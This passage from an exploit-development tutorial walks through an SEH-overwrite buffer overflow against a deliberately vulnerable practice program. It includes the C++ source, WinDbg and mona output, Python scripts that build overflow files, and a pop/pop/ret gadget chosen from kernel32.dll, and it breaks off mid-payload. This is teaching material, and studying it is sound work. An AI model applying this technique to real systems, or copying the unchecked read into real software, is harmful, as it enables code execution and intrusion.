name.dat"
,
 
"rb"
);
 
    
if
 
(!
f
)
 
        
return
 
-
1
;
 
    
fseek
(
f
,
 
0L
,
 
SEEK_END
);
 
    
long
 
bytes
 
=
 
ftell
(
f
);
 
    
fseek
(
f
,
 
0L
,
 
SEEK_SET
);
 
    
fread
(
name
,
 
1
,
 
bytes
,
 
f
);
 
    
name
[
bytes
]
 
=
 
'
\
0'
;
 
    
fclose
(
f
);
 
 
printf
(
"Hi, %s!
\
n"
,
 
name
);
 
    
return
 
0
;
 
}
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 109 
-
 
Since we can’t take control of EIP through 
ret eip
, we’ll try to modify the 
SEH chain
 by overwriting it. Lucky 
for us, the chain is on the stack. See the 
Structure Exception Handling (SE
H)
 article if you don’t remember 
the specifics.
 
Open 
exploitme2.exe
 in WinDbg, put a breakpoint on 
main
 with
 
bp exploitme2!main
 
and then let the program run by pressing 
F5
 (go).
 
When the execution stops (you should also see the source code) have a look at
 the stack and the SEH 
chain:
 
0:000> dd esp
 
0038fb20  011814d9 00000001 00625088 00615710
 
0038fb30  bd0c3ff1 00000000 00000000 7efde000
 
0038fb40  00000000 0038fb30 00000001 0038fb98
 
0038fb50  01181969 bc2ce695 00000000 0038fb68
 
0038fb60  75dd338a 7efde000 
0038fba8 77c09f72
 
0038fb70  7efde000 77ebad68 00000000 00000000
 
0038fb80  7efde000 00000000 00000000 00000000
 
0038fb90  0038fb74 00000000 ffffffff 77c471f5
 
0:000> !exchain
 
0038fb4c: exploitme2!_except_handler4+0 (01181969)
 
  CRT scope  0, filter: exploitme
2!__tmainCRTStartup+115 (011814f1)
 
                func:   exploitme2!__tmainCRTStartup+129 (01181505)
 
0038fb98: ntdll!WinSqmSetIfMaxDWORD+31 (77c471f5)
 
Remember that SEH nodes are 8
-
byte long and have this form:
 
<ptr to next SEH node in list>
 
<ptr to hand
ler>
 
We can see that the first node is at address 0x38fb4c (i.e. 
esp+0x2c
) and contains
 
0038fb98         <
--
 next SEH node
 
01181969         <
--
 handler (exploitme2!_except_handler4)
 
The next and last SEH node is at 0x38fb98 (i.e.
 esp+0x78
) and contains
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 110 
-
 
fff
fffff         <
--
 next SEH node (none 
-
 this is the last node)
 
77c471f5         <
--
 handler (ntdll!WinSqmSetIfMaxDWORD+31)
 
Now put 100 ‘
a
‘s in 
c:
\
name.dat
 and step over the code (
F10
) until you have executed the 
fread()
 function. 
Let’s examine the SEH chai
n again:
 
0:000> !exchain
 
0038fb4c: 61616161
 
Invalid exception stack at 61616161
 
As we can see, we managed to overwrite the SEH chain. Now let the program run (
F5
).
 
WinDbg will print the following:
 
STATUS_STACK_BUFFER_OVERRUN encountered
 
(1610.1618): Break 
instruction exception 
-
 code 80000003 (first chance)
 
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:
\
Windows
\
syswow64
\
kernel32.dll 
-
 
eax=00000000 ebx=01182108 ecx=75e1047c edx=0038f4d1 esi=00000000 edi=6d5ee060
 
eip=75e1025d e
sp=0038f718 ebp=0038f794 iopl=0         nv up ei pl zr na pe nc
 
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
 
kernel32!GetProfileStringW+0x12cc1:
 
75e1025d cc              int     3
 
This might mean that the epilog of 
main()
 d
etected that the cookie was modified and stopped us before we 
could do anything, but, actually, this security violation is due to some 
bounds checking
 related to the 
assignment after 
fread
:
 
C++
 
 
#include <cstdio>
 
 
int
 
main
()
 
{
 
    
char
 
name
[
32
];
 
    
print
f
(
"Reading name from file...
\
n"
);
 
 
FILE
 
*
f
 
=
 
fopen
(
"c:
\
\
name.dat"
,
 
"rb"
);
 
    
if
 
(!
f
)
 
        
return
 
-
1
;
 
    
fseek
(
f
,
 
0L
,
 
SEEK_END
);
 
    
long
 
bytes
 
=
 
ftell
(
f
);
 
    
fseek
(
f
,
 
0L
,
 
SEEK_SET
);
 
    
fread
(
name
,
 
1
,
 
bytes
,
 
f
);
 
    
name
[
bytes
]
 
=
 
'
\
0'
;
     
<
----
---------------------
 
    
fclose
(
f
);
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 111 
-
 
 
printf
(
"Hi, %s!
\
n"
,
 
name
);
 
    
return
 
0
;
 
}
 
 
Here’s the bounds checking:
 
 
 name[bytes] = '
\
0';
 
008B107A 83 FE 20
 
 
 cmp
 
 
 esi,20h
 
 
 ; esi = bytes
 
008B107D 73 30
 
 
 jae
 
 
 m
ain+0AFh (08B10AFh) 
 
 
008B107F 57
 
 
 push
 
 
 edi 
 
 
008B1080 C6 44 35 DC 00
 
 
 mov
 
 
 byte ptr name[esi],0 
 
 
.
 
.
 
.
 
008B10AF E8 48 01 00 00
 
 
 call
 
 
 __report_rangecheckfailure (08B11FCh)
 
In this case the epilog is never re
ached because of the bounds checking but the concept is the same. We 
overwrote the SEH chain but no exception was generated so the SEH chain wasn’t even used. We need to 
raise an exception 
before
 the bounds checking is performed (or the epilog of 
main()
 is
 reached).
 
Let’s do an experiment: let’s see if an exception would call the handler specified on the SEH chain. Modify 
the code as follows:
 
C++
 
 
#include <cstdio>
 
 
int
 
main
()
 
{
 
    
char
 
name
[
32
];
 
    
printf
(
"Reading name from file...
\
n"
);
 
 
FILE
 
*
f
 
=
 
fopen
(
"c:
\
\
name.dat"
,
 
"rb"
);
 
    
if
 
(!
f
)
 
        
return
 
-
1
;
 
    
fseek
(
f
,
 
0L
,
 
SEEK_END
);
 
    
long
 
bytes
 
=
 
ftell
(
f
);
 
    
fseek
(
f
,
 
0L
,
 
SEEK_SET
);
 
    
fread
(
name
,
 
1
,
 
bytes
,
 
f
);
 
    
name
[
bytes
]
 
=
 
bytes
 
/
 
0
;
 
// '
\
0';    !!! divide by 0 !!!
 
    
fclose
(
f
);
 
 
p
rintf
(
"Hi, %s!
\
n"
,
 
name
);
 
    
return
 
0
;
 
}
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 112 
-
 
Note that we added a 
division by 0
 right after the 
fread()
 function. This should generate an exception and 
call the first handler of the SEH chain.
 
Compile the code, reopen it in WinDbg and hit 
F5
 (go). This is wh
at happens:
 
(177c.12f4): Integer divide
-
by
-
zero 
-
 code c0000094 (first chance)
 
First chance exceptions are reported before any exception handling.
 
This exception may be expected and handled.
 
*** WARNING: Unable to verify checksum for exploitme2.exe
 
eax=000
00064 ebx=6d5ee060 ecx=00000000 edx=00000000 esi=00000001 edi=00000064
 
eip=012f107a esp=002cfbd4 ebp=002cfc2c iopl=0         nv up ei pl zr na pe nc
 
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
 
exploitme2!main+0x7a:
 
012f107
a f7f9            idiv    eax,ecx
 
As we can see, WinDbg caught the exception before it could be seen by the program. Hit 
F5
 (go) again to 
pass the exception to the program. Here’s what we see:
 
(177c.12f4): Access violation 
-
 code c0000005 (first chance)
 
Fi
rst chance exceptions are reported before any exception handling.
 
This exception may be expected and handled.
 
eax=00000000 ebx=00000000 ecx=61616161 edx=77c2b4ad esi=00000000 edi=00000000
 
eip=61616161 esp=002cf638 ebp=002cf658 iopl=0         nv up ei pl zr
 na pe nc
 
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
 
61616161 ??              ???
 
We can see that 
EIP = 0x61616161
. The only explanation is that the handler in the modified SEH chain was 
called!
 
Now we must find a way to 
raise an exception on our own before the bounds checking is performed (or the 
cookie is checked by the epilog of the 
main()
 function). First of all, we’ll remove the exception and change 
our code a little:
 
C++
 
 
#include <cstdio>
 
 
int
 
main
()
 
{
 
    
char
 
nam
e
[
32
];
 
    
printf
(
"Reading name from file...
\
n"
);
 
 
FILE
 
*
f
 
=
 
fopen
(
"c:
\
\
name.dat"
,
 
"rb"
);
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 113 
-
 
    
if
 
(!
f
)
 
        
return
 
-
1
;
 
    
fseek
(
f
,
 
0L
,
 
SEEK_END
);
 
    
long
 
bytes
 
=
 
ftell
(
f
);
 
    
fseek
(
f
,
 
0L
,
 
SEEK_SET
);
 
    
int
 
pos
 
=
 
0
;
 
    
while
 
(
pos
 
<
 
bytes
)
 
{
 
    
int
 
len
 
=
 
bytes
 
-
 
pos
 
>
 
200
 
?
 
200
 
:
 
bytes
 
-
 
pos
;
 
        
fread
(
name
 
+
 
pos
,
 
1
,
 
len
,
 
f
);
 
        
pos
 
+=
 
len
;
 
    
}
 
    
name
[
bytes
]
 
=
 
'
\
0'
;
 
    
fclose
(
f
);
 
 
printf
(
"Hi, %s!
\
n"
,
 
name
);
 
    
return
 
0
;
 
}
 
 
We decided to read the file in blocks of 200 bytes
 because 
fread()
 may fail if it’s asked to read too many 
bytes. This way we can have a long file.
 
The stack is not infinite so if we keep writing to it till the end (highest address) an access violation will be 
raised. Let’s run 
Python’s IDLE
 and try with 
1000 “
a
“s:
 
Python
 
 
with
 
open
(
'c:
\
\
name.dat'
,
 
'wb'
)
 
as
 
f
:
 
    
f
.
write
(
'a'
*
1000
)
 
 
By running 
exploitme2.exe
 in WinDbg it’s easy to verify that 1000 “
a
“s aren’t enough. Let’s try with 2000:
 
Python
 
 
with
 
open
(
'c:
\
\
name.dat'
,
 
'wb'
)
 
as
 
f
:
 
    
f
.
write
(
'a'
*
2000
)
 
 
It doesn’t work either. Finally, with 10000 “
a
“s, we get this:
 
(17d4.1244): Access violation 
-
 code c0000005 (first chance)
 
First chance exceptions are reported before any exception handling.
 
This exception may be expected and handled.
 
*** ERROR: Symbol fi
le could not be found.  Defaulted to export symbols for C:
\
Windows
\
SysWOW64
\
MSVCR120.dll 
-
 
eax=00816808 ebx=000000c8 ecx=00000030 edx=000000c8 esi=008167d8 edi=003c0000
 
eip=6d51f20c esp=003bfb68 ebp=003bfb88 iopl=0         nv up ei ng nz na pe cy
 
cs=0023  
ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010287
 
MSVCR120!wcslen+0x19:
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 114 
-
 
6d51f20c f3a4            rep movs byte ptr es:[edi],byte ptr [esi]
 
After pressing 
F5
 (go) we get:
 
(17d4.1244): Access violation 
-
 code c0000005 (first chance)
 
First 
chance exceptions are reported before any exception handling.
 
This exception may be expected and handled.
 
eax=00000000 ebx=00000000 ecx=61616161 edx=77c2b4ad esi=00000000 edi=00000000
 
eip=61616161 esp=003bf5cc ebp=003bf5ec iopl=0         nv up ei pl zr na 
pe nc
 
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
 
61616161 ??              ???
 
This is what we wanted: 
EIP = 0x61616161
. We know that our “
a
“s overwrote the handler address of a SEH 
node, but which 4 “
a
“s exactly? In other
 words, 
at what offset
 in the file should we put the address we want 
to redirect the execution to?
 
An easy way to do this is to use a special pattern instead of simple “
a
“s. This pattern is designed so that 
given 4 consecutive bytes of the pattern we can t
ell immediately at which offset of the pattern these 4 bytes 
are located.
 
mona
 (
article
) can help us with this:
 
0:000> !py mona pattern_create 10000
 
Hold on...
 
[+] Command used:
 
!py mona.py pattern_create 10000
 
Creating
 cyclic pattern of 10000 bytes
 
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8...
(snipped)
 
[+] Preparing output file 'pattern.txt'
 
    
-
 (Re)setting logfile pattern.txt
 
Note: don't copy this pattern from the log window, it might be truncated !
 
It
's better to open pattern.txt and copy the pattern from the file
 
 
[+] This mona.py action took 0:00:00
 
With a little bit of Python we can write the pattern to 
c:
\
name.dat
:
 
Python
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 115 
-
 
with
 
open
(
'c:
\
\
name.dat'
,
 
'wb'
)
 
as
 
f
:
 
    
pattern
 
=
 
'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa
7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8...(snipped)'
 
    
f
.
write
(
pattern
)
 
 
Note that I snipped the pattern because it was too long to show here.
 
We restart 
exploitme2.exe
 in WinDbg, we hit 
F5
 (go) twice and we get:
 
(11e0.11e8): Access violation 
-
 code c0000005 
(first chance)
 
First chance exceptions are reported before any exception handling.
 
This exception may be expected and handled.
 
eax=00000000 ebx=00000000 ecx=64413963 edx=77c2b4ad esi=00000000 edi=00000000
 
eip=64413963 esp=0042f310 ebp=0042f330 iopl=0      
   nv up ei pl zr na pe nc
 
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
 
64413963 ??              ???
 
We can see that 
EIP = 0x64413963
. Let’s see at which offset of the pattern it’s located. Remeber that Intel 
CPUs are 
littl
e endian
 so 
0x64413963 = “
\
x63
\
x39
\
x41
\
x64
′′ = “c9Ad”
. Let’s use mona to determine the 
offset:
 
0:000> !py mona pattern_offset 64413963
 
Hold on...
 
[+] Command used:
 
!py mona.py pattern_offset 64413963
 
Looking for c9Ad in pattern of 500000 bytes
 
 
-
 Pattern c9
Ad (0x64413963) found in cyclic pattern at position 88
 
Looking for c9Ad in pattern of 500000 bytes
 
Looking for dA9c in pattern of 500000 bytes
 
 
-
 Pattern dA9c not found in cyclic pattern (uppercase)  
 
Looking for c9Ad in pattern of 500000 bytes
 
Looking for
 dA9c in pattern of 500000 bytes
 
 
-
 Pattern dA9c not found in cyclic pattern (lowercase)  
 
 
[+] This mona.py action took 0:00:00.172000
 
The offset is 88. Let’s verify that that’s the correct offset with the following Python script:
 
Python
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 116 
-
 
 
with
 
open
(
'c:
\
\
n
ame.dat'
,
 
'wb'
)
 
as
 
f
:
 
    
handler
 
=
 
'bbbb'
 
    
f
.
write
(
'a'
*
88
 
+
 
handler
 
+
 
'c'
*(
10000
-
88
-
len
(
handler
)))
 
 
This time WinDbg outputs this:
 
(1b0c.1bf4): Access violation 
-
 code c0000005 (first chance)
 
First chance exceptions are reported before any exception ha
ndling.
 
This exception may be expected and handled.
 
eax=00000000 ebx=00000000 ecx=62626262 edx=77c2b4ad esi=00000000 edi=00000000
 
eip=62626262 esp=002af490 ebp=002af4b0 iopl=0         nv up ei pl zr na pe nc
 
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=
002b             efl=00010246
 
62626262 ??              ???
 
Since 
0x62626262 = “bbbb”
, this is exactly what we wanted.
 
Now that we know where to put our address in the file, we need to decide which address to use. In WinDbg 
click on 
View
→
Memory
 and under “
V
irtual:
” type 
@esp
 to see the part of stack pointed to by ESP. In my 
case, 
ESP = 0x2af490
 and our “
b
“s are at 
@esp+6d4
.
 
Let’s restart
 exploitme2.exe
 to see if 6d4 is a constant. Enter again 
@esp+6d4
 under “
Virtual:
” in the 
Memory
 window and you should see 
that it still points to our 4 “
b
“s. We can also see that ESP is always 
different, even though the offset 6d4 doesn’t change.
 
So we could put our shellcode right after the 4 “
b
“s and replace those “
b
“s with the address of a piece of 
code like this:
 
Assembly
 (x86)
 
 
ADD
   
ESP
,
 
6d8
 
JMP
   
ESP
 
 
Note that we used 6d8, i.e. 
6d4+4
 to skip the “
b
“s and jump to the shellcode which we’ll put in place of our 
“
c
“s. Of course, 
ADD ESP, 6e0
 or similar would do as well. Unfortunately, it’s not easy to find such code, but 
th
ere’s an easier way.
 
Restart 
exploitme2.exe
, hit 
F5
 (go) twice and have another look at the stack:
 
0:000> dd esp
 
002df45c  77c2b499 002df544 002dfb2c 002df594
 
002df46c  002df518 002dfa84 77c2b4ad 002dfb2c
 
002df47c  002df52c 77c2b46b 002df544 002dfb2c
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 117 
-
 
002df
48c  002df594 002df518 62626262 00000000
 
002df49c  002df544 002dfb2c 77c2b40e 002df544
 
002df4ac  002dfb2c 002df594 002df518 62626262
 
002df4bc  002e1000 002df544 00636948 00000000
 
002df4cc  00000000 00000000 00000000 00000000
 
The dword at
 esp+8
 looks intere
sting. If we have a look at that address we see the following:
 
0:000> db poi(esp+8)
 
002dfb2c  61 61 61 61 62 62 62 62
-
63 63 63 63 63 63 63 63  aaaabbbbcccccccc
 
002dfb3c  63 63 63 63 63 63 63 63
-
63 63 63 63 63 63 63 63  cccccccccccccccc
 
002dfb4c  63 63 63 6
3 63 63 63 63
-
63 63 63 63 63 63 63 63  cccccccccccccccc
 
002dfb5c  63 63 63 63 63 63 63 63
-
63 63 63 63 63 63 63 63  cccccccccccccccc
 
002dfb6c  63 63 63 63 63 63 63 63
-
63 63 63 63 63 63 63 63  cccccccccccccccc
 
002dfb7c  63 63 63 63 63 63 63 63
-
63 63 63 63 63
 63 63 63  cccccccccccccccc
 
002dfb8c  63 63 63 63 63 63 63 63
-
63 63 63 63 63 63 63 63  cccccccccccccccc
 
002dfb9c  63 63 63 63 63 63 63 63
-
63 63 63 63 63 63 63 63  cccccccccccccccc
 
It seems that 0x2dfb2c points to the 4 “
a
“s preceding our “
b
“s. Remember tha
t “
bbbb
” overwrote the 
“
handler
” field of a SEH node, so 0x2dfb2c must point to the “
next SEH node
” field of the same SEH node. 
Let’s verify this:
 
0:000> !exchain
 
002df470: ntdll!ExecuteHandler2+3a (77c2b4ad)
 
002dfa84: MSVCR120!_ValidateRead+439 (6d52a0d5)
 
002dfb2c: 62626262
 
Invalid exception stack at 61616161
 
It seems that we overwrote the third SEH node:
 
0:000> dt _EXCEPTION_REGISTRATION_RECORD 002dfb2c
 
ntdll!_EXCEPTION_REGISTRATION_RECORD
 
   +0x000 Next             : 0x61616161 _EXCEPTION_REGISTRATION_RE
CORD
 
   +0x004 Handler          : 0x62626262     _EXCEPTION_DISPOSITION  +62626262
 
First of all, make sure that 
esp+8
 always contain the right address by restarting the process and trying again. 
After having verified that, we need to find something like th
is:
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 118 
-
 
POP   reg32
 
POP   reg32
 
RET
 
The idea is to put the address of such a piece of code in place of our 4 “
b
“s. When executed, this code will 
increment ESP by 8 (through the two 
POP
s) and then extract the value pointed to by ESP and jump to it. 
This does ex
actly what we want, i.e. it’ll jump to the 4 “
a
“s right before our “
b
“s. To skip the “
b
“s and jump to 
our shellcode (our “
c
“s), we need to put a 
jmp
 right before the “
b
“s.
 
The opcode of a 
JMP short
 is
 
EB XX
 
where 
XX
 is a 
signed byte
. Let’s add a label for 
convenience:
 
here:
 
  EB XX
 
That opcode jumps to 
here+2+XX
. For example,
 
  EB 00
 
there:
 
jumps right after the jump itself, i.e. to 
there
.
 
This is what we want:
 
 
90 is the opcode for a 
NOP
 (no operation 
–
 it does nothing) but we can use whatever we want since those 
two bytes will by skipped.
 
Now let’s find the address of 
pop/pop/ret
 in 
kernel32.dll
:
 
0:000> !py mona findwild 
-
s "pop r32#p
op r32#ret" 
-
m kernel32.dll
 
Hold on...
 
[+] Command used:
 
!py mona.py findwild 
-
s pop r32#pop r32#ret 
-
m kernel32.dll
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 119 
-
 
 
----------
 Mona command started on 2015
-
03
-
18 20:33:46 (v2.0, rev 554) 
----------
 
[+] Processing arguments and criteria
 
    
-
 Pointer acce
ss level : X
 
    
-
 Only querying modules kernel32.dll
 
[+] Type of search: str
 
[+] Searching for matches up to 8 instructions deep
 
[+] Generating module info table, hang on...
 
    
-
 Processing modules
 
    
-
 Done. Let's rock 'n roll.
 
[+] Started search (8 st
art patterns)
 
[+] Searching startpattern between 0x75dc0000 and 0x75ed0000
 
[+] Preparing output file 'findwild.txt'
 
    
-
 (Re)setting logfile findwild.txt
 
[+] Writing results to findwild.txt
 
    
-
 Number of pointers of type 'pop edi # pop ebp # retn 24h' :
 1
 
    
-
 Number of pointers of type 'pop esi # pop ebx # retn' : 2
 
    
-
 Number of pointers of type 'pop ebx # pop ebp # retn 14h' : 4
 
    
-
 Number of pointers of type 'pop ebx # pop ebp # retn 10h' : 14
 
    
-
 Number of pointers of type 'pop edi # pop esi 
# retn' : 2
 
    
-
 Number of pointers of type 'pop edi # pop ebp # retn 8' : 13
 
    
-
 Number of pointers of type 'pop eax # pop ebp # retn 1ch' : 2
 
    
-
 Number of pointers of type 'pop ecx # pop ebx # retn 4' : 1
 
    
-
 Number of pointers of type 'pop esi #
 pop ebp # retn' : 1
 
    
-
 Number of pointers of type 'pop ebx # pop ebp # retn 1ch' : 4
 
    
-
 Number of pointers of type 'pop eax # pop ebp # retn 0ch' : 8
 
    
-
 Number of pointers of type 'pop edi # pop ebp # retn 1ch' : 2
 
    
-
 Number of pointers of typ
e 'pop eax # pop ebp # retn 20h' : 2
 
    
-
 Number of pointers of type 'pop esi # pop ebp # retn 0ch' : 49
 
    
-
 Number of pointers of type 'pop eax # pop ebp # retn' : 2
 
    
-
 Number of pointers of type 'pop eax # pop ebp # retn 4' : 3
 
    
-
 Number of poin
ters of type 'pop esi # pop ebp # retn 20h' : 2
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 120 
-
 
    
-
 Number of pointers of type 'pop ebx # pop ebp # retn 0ch' : 27
 
    
-
 Number of pointers of type 'pop esi # pop ebp # retn 24h' : 1
 
    
-
 Number of pointers of type 'pop eax # pop ebp # retn 18h' : 3
 
   
-
 Number of pointers of type 'pop edi # pop ebp # retn 0ch' : 11
 
    
-
 Number of pointers of type 'pop esi # pop ebp # retn 10h' : 15
 
    
-
 Number of pointers of type 'pop esi # pop ebp # retn 18h' : 10
 
    
-
 Number of pointers of type 'pop esi # pop ebp 
# retn 14h' : 11
 
    
-
 Number of pointers of type 'pop edi # pop ebp # retn 10h' : 6
 
    
-
 Number of pointers of type 'pop eax # pop ebp # retn 8' : 5
 
    
-
 Number of pointers of type 'pop ebx # pop ebp # retn 4' : 11
 
    
-
 Number of pointers of type 'pop 
esi # pop ebp # retn 4' : 70
 
    
-
 Number of pointers of type 'pop esi # pop ebp # retn 8' : 62
 
    
-
 Number of pointers of type 'pop edx # pop eax # retn' : 1
 
    
-
 Number of pointers of type 'pop ebx # pop ebp # retn 8' : 26
 
    
-
 Number of pointers of t
ype 'pop ebx # pop ebp # retn 18h' : 6
 
    
-
 Number of pointers of type 'pop ebx # pop ebp # retn 20h' : 2
 
    
-
 Number of pointers of type 'pop eax # pop ebp # retn 10h' : 3
 
    
-
 Number of pointers of type 'pop eax # pop ebp # retn 14h' : 3
 
    
-
 Number 
of pointers of type 'pop ebx # pop ebp # retn' : 4
 
    
-
 Number of pointers of type 'pop edi # pop ebp # retn 14h' : 2
 
    
-
 Number of pointers of type 'pop edi # pop ebp # retn 4' : 5
 
[+] Results :
 
0x75dd4e18 |   0x75dd4e18 (b+0x00014e18)  : pop edi # pop
 ebp # retn 24h |  {PAGE_EXECUTE_READ} [kernel32.dll] AS
LR: True, Rebase: False, SafeSEH: True, OS: True, v6.1.7601.18409 (C:
\
Windows
\
syswow64
\
kernel32.dll)
 
0x75dfd75d |   0x75dfd75d (b+0x0003d75d)  : pop esi # pop ebx # retn |  {PAGE_EXECUTE_READ} [kernel
32.dll] ASLR: Tr
ue, Rebase: False, SafeSEH: True, OS: True, v6.1.7601.18409 (C:
\
Windows
\
syswow64
\
kernel32.dll)
 
0x75dfd916 |   0x75dfd916 (b+0x0003d916)  : pop esi # pop ebx # retn |  {PAGE_EXECUTE_READ} [kernel32.dll] ASLR: Tr
ue, Rebase: False, SafeSEH: Tr
ue, OS: True, v6.1.7601.18409 (C:
\
Windows
\
syswow64
\
kernel32.dll)
 
0x75dd4f7c |   0x75dd4f7c (b+0x00014f7c)  : pop ebx # pop ebp # retn 14h |  {PAGE_EXECUTE_READ} [kernel32.dll] ASL
R: True, Rebase: False, SafeSEH: True, OS: True, v6.1.7601.18409 (C:
\
Windows
\
syswow64
\
kernel32.dll)
 
0x75ddf840 |   0x75ddf840 (b+0x0001f840)  : pop ebx # pop ebp # retn 14h |  {PAGE_EXECUTE_READ} [kernel32.dll] ASL
R: True, Rebase: False, SafeSEH: True, OS: True, v6.1.7601.18409 (C:
\
Windows
\
syswow64
\
kernel32.dll)
 
0x75dfc1ca |   0x75
dfc1ca (b+0x0003c1ca)  : pop ebx # pop ebp # retn 14h |  {PAGE_EXECUTE_READ} [kernel32.dll] ASL
R: True, Rebase: False, SafeSEH: True, OS: True, v6.1.7601.18409 (C:
\
Windows
\
syswow64
\
kernel32.dll)
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 121 
-
 
0x75e7a327 |   0x75e7a327 (b+0x000ba327)  : pop ebx # pop ebp
 # retn 14h |  {PAGE_EXECUTE_READ} [kernel32.dll] A
SLR: True, Rebase: False, SafeSEH: True, OS: True, v6.1.7601.18409 (C:
\
Windows
\
syswow64
\
kernel32.dll)
 
0x75de1267 |   0x75de1267 (b+0x00021267)  : pop ebx # pop ebp # retn 10h |  {PAGE_EXECUTE_READ} [kernel
32.dll] A
SLR: True, Rebase: False, SafeSEH: True, OS: True, v6.1.7601.18409 (C:
\
Windows
\
syswow64
\
kernel32.dll)
 
0x75defda1 |   0x75defda1 (b+0x0002fda1)  : pop ebx # pop ebp # retn 10h |  {PAGE_EXECUTE_READ} [kernel32.dll] ASL
R: True, Rebase: False, SafeSEH
: True, OS: True, v6.1.7601.18409 (C:
\
Windows
\
syswow64
\
kernel32.dll)
 
0x75dfb33c |   0x75dfb33c (b+0x0003b33c)  : pop ebx # pop ebp # retn 10h |  {PAGE_EXECUTE_READ} [kernel32.dll] ASL
R: True, Rebase: False, SafeSEH: True, OS: True, v6.1.7601.18409 (C:
\
Wind
ows
\
syswow64
\
kernel32.dll)
 
0x75dfbf8a |   0x75dfbf8a (b+0x0003bf8a)  : pop ebx # pop ebp # retn 10h |  {PAGE_EXECUTE_READ} [kernel32.dll] ASL
R: True, Rebase: False, SafeSEH: True, OS: True, v6.1.7601.18409 (C:
\
Windows
\
syswow64
\
kernel32.dll)
 
0x75dfda42 |   
0x75dfda42 (b+0x0003da42)  : pop ebx # pop ebp # retn 10h |  {PAGE_EXECUTE_READ} [kernel32.dll] AS
LR: True, Rebase: False, SafeSEH: True, OS: True, v6.1.7601.18409 (C:
\
Windows
\
syswow64
\
kernel32.dll)
 
0x75e45960 |   0x75e45960 (b+0x00085960)  : pop ebx # pop
 ebp # retn 10h |  {PAGE_EXECUTE_READ} [kernel32.dll] A
SLR: True, Rebase: False, SafeSEH: True, OS: True, v6.1.7601.18409 (C:
\
Windows
\
syswow64
\
kernel32.dll)
 
0x75e47b36 |   0x75e47b36 (b+0x00087b36)  : pop ebx # pop ebp # retn 10h |  {PAGE_EXECUTE_READ} [ke
rnel32.dll] A
SLR: True, Rebase: False, SafeSEH: True, OS: True, v6.1.7601.18409 (C:
\
Windows
\
syswow64
\
kernel32.dll)
 
0x75e4a53f |   0x75e4a53f (b+0x0008a53f)  : pop ebx # pop ebp # retn 10h |  {PAGE_EXECUTE_READ} [kernel32.dll] ASL
R: True, Rebase: False, Saf
eSEH: True, OS: True, v6.1.7601.18409 (C:
\
Windows
\
syswow64
\
kernel32.dll)
 
0x75e5e294 |   0x75e5e294 (b+0x0009e294)  : pop ebx # pop ebp # retn 10h |  {PAGE_EXECUTE_READ} [kernel32.dll] A
SLR: True, Rebase: False, SafeSEH: True, OS: True, v6.1.7601.18409 (C:
\
Windows
\
syswow64
\
kernel32.dll)
 
0x75e65641 |   0x75e65641 (b+0x000a5641)  : pop ebx # pop ebp # retn 10h |  {PAGE_EXECUTE_READ} [kernel32.dll] A
SLR: True, Rebase: False, SafeSEH: True, OS: True, v6.1.7601.18409 (C:
\
Windows
\
syswow64
\
kernel32.dll)
 
0x75e6a121 
|   0x75e6a121 (b+0x000aa121)  : pop ebx # pop ebp # retn 10h |  {PAGE_EXECUTE_READ} [kernel32.dll] A
SLR: True, Rebase: False, SafeSEH: True, OS: True, v6.1.7601.18409 (C:
\
Windows
\
syswow64
\
kernel32.dll)
 
0x75e77bf1 |   0x75e77bf1 (b+0x000b7bf1)  : pop ebx #
 pop ebp # retn 10h |  {PAGE_EXECUTE_READ} [kernel32.dll] ASL
R: True, Rebase: False, SafeSEH: True, OS: True, v6.1.7601.18409 (C:
\
Windows
\
syswow64
\
kernel32.dll)
 
0x75e7930d |   0x75e7930d (b+0x000b930d)  : pop ebx # pop ebp # retn 10h |  {PAGE_EXECUTE_READ}
 [kernel32.dll] A
SLR: True, Rebase: False, SafeSEH: True, OS: True, v6.1.7601.18409 (C:
\
Windows
\
syswow64
\
kernel32.dll)
 
... Please wait while I'm processing all remaining results and writing everything to file...
 
[+] Done. Only the first 20 pointers are sho
wn here. For more pointers, open findwild.txt...
 
    Found a total of 396 pointers
 
 
[+] This mona.py action took 0:00:12.400000
 
Let’s choose the second one:
 
0x75dfd75d |   0x75dfd75d (b+0x0003d75d)  : pop esi # pop ebx # retn
 
So our schema becomes like thi
s:
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 122 
-
 
 
Here’s the Python code to create 
name.dat
:
 
Python
 
 
with
 
open
(
'c:
\
\
name.dat'
,
 
'wb'
)
 
as
 
f
:
 
    
jmp
 
=
 
'
\
xeb
\
